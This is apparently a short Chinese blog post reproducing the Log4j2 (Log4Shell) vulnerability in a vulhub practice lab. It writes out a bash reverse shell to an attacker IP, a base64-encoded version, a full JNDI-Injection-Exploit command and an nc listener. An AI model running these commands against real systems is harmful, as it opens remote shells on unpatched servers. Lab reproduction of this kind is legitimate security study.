vulhub靶场log4j2漏洞复现

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问

相关推荐
chase。1 小时前
关于 nvidia-smi: no devices were found 解决方案
服务器·数据库·postgresql
Robpubking4 小时前
AWS 中 S3 的 server-side encryption 解释与说明
运维·aws
陌路207 小时前
Linux 34TCP服务器多进程并发
linux·服务器·网络
爱喝矿泉水的猛男7 小时前
单周期Risc-V指令拆分与datapath绘制
运维·服务器·risc-v
科技块儿7 小时前
【IP】公有&私有IP地址?
服务器·网络协议·tcp/ip
hakukun7 小时前
docker避免每次sudo方法
运维·docker·容器
杨凯凡7 小时前
Docker Compose:多容器应用编排入门与实战
运维·docker·容器
jason.zeng@15022077 小时前
my.cnf详解
运维·数据库·adb
灵神翁7 小时前
自建node云函数服务器
运维·服务器
TangDuoduo00058 小时前
【IO模型与并发服务器】
运维·服务器·网络·tcp/ip